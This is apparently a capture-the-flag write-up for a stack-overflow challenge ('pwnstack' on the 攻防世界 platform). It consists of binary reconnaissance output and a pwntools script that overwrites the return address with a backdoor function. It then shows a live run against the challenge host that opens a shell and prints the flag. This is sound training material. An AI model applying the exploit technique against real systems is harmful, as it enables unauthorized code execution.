pwnstack-攻防世界




.text:0000000000400762

giantbranch@ubuntu:~/Desktop$ file pwn2
pwn2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=62aa40d64871e142a32827b4e403772e72f67fba, not stripped

giantbranch@ubuntu:~/Desktop$ file pwn2
pwn2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=62aa40d64871e142a32827b4e403772e72f67fba, not stripped
giantbranch@ubuntu:~/Desktop$ checksec pwn2
[*] '/home/giantbranch/Desktop/pwn2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
giantbranch@ubuntu:~/Desktop$ strings pwn2 | grep sh
/bin/sh
.shstrtab
.gnu.hash
giantbranch@ubuntu:~/Desktop$ objdump -d pwn2 | grep system
0000000000400570 <system@plt>:
  400770:	e8 fb fd ff ff       	callq  400570 <system@plt>
giantbranch@ubuntu:~/Desktop$ objdump -d pwn2 | grep backdoor
0000000000400762 <backdoor>:
giantbranch@ubuntu:~/Desktop$ cat pwn2poc1.py 
from pwn import *
# amd64 Linux target; debug logging shows every byte sent and received
context(log_level='debug',arch='amd64',os='linux')
io=remote('61.147.171.105',62376)
#61.147.171.105 62376
# distance from the start of the overflowed stack buffer to the saved return address
pad=168

# wait here so a debugger can be attached before the payload is sent
pause()

# address of backdoor() (see the objdump output above); the binary has no PIE, so it is fixed
ret_addr=0x0000000000400762
# filler bytes up to the saved return address, then the backdoor address as little-endian qword
payload=b'A'*pad+p64(ret_addr)

# the program prompts "this is pwn1,can you do that??" before reading input
delimiter='that??'

io.sendlineafter(delimiter,payload)
io.interactive()


giantbranch@ubuntu:~/Desktop$ ROPgadget --binary pwn2 --only "pop|ret"|grep rdi
0x0000000000400813 : pop rdi ; ret
giantbranch@ubuntu:~/Desktop$ 

giantbranch@ubuntu:~/Desktop$ python2 pwn2poc1.py 
[+] Opening connection to 61.147.171.105 on port 62376: Done
[*] Paused (press any to continue)
[DEBUG] Received 0x1f bytes:
    'this is pwn1,can you do that??\n'
[DEBUG] Sent 0xb1 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    000000a0  41 41 41 41  41 41 41 41  62 07 40 00  00 00 00 00  │AAAA│AAAA│b·@·│····│
    000000b0  0a                                                  │·│
    000000b1
[*] Switching to interactive mode

$ id
[DEBUG] Sent 0x3 bytes:
    'id\n'
[DEBUG] Received 0xc bytes:
    '/bin/sh: 1: '
/bin/sh: 1: [DEBUG] Received 0xe bytes:
    'id: not found\n'
id: not found
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x2d bytes:
    'cyberpeace{6c9e27e4cd6f2716234d85e2585562b9}\n'
cyberpeace{6c9e27e4cd6f2716234d85e2585562b9}
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
[DEBUG] Received 0x22 bytes:
    'bin\n'
    'dev\n'
    'flag\n'
    'lib\n'
    'lib32\n'
    'lib64\n'
    'pwn2\n'
bin
dev
flag
lib
lib32
lib64
pwn2
$ 
[*] Interrupted
[*] Closed connection to 61.147.171.105 port 62376

Ref:

https://blog.csdn.net/weixin_63282980/article/details/127702165
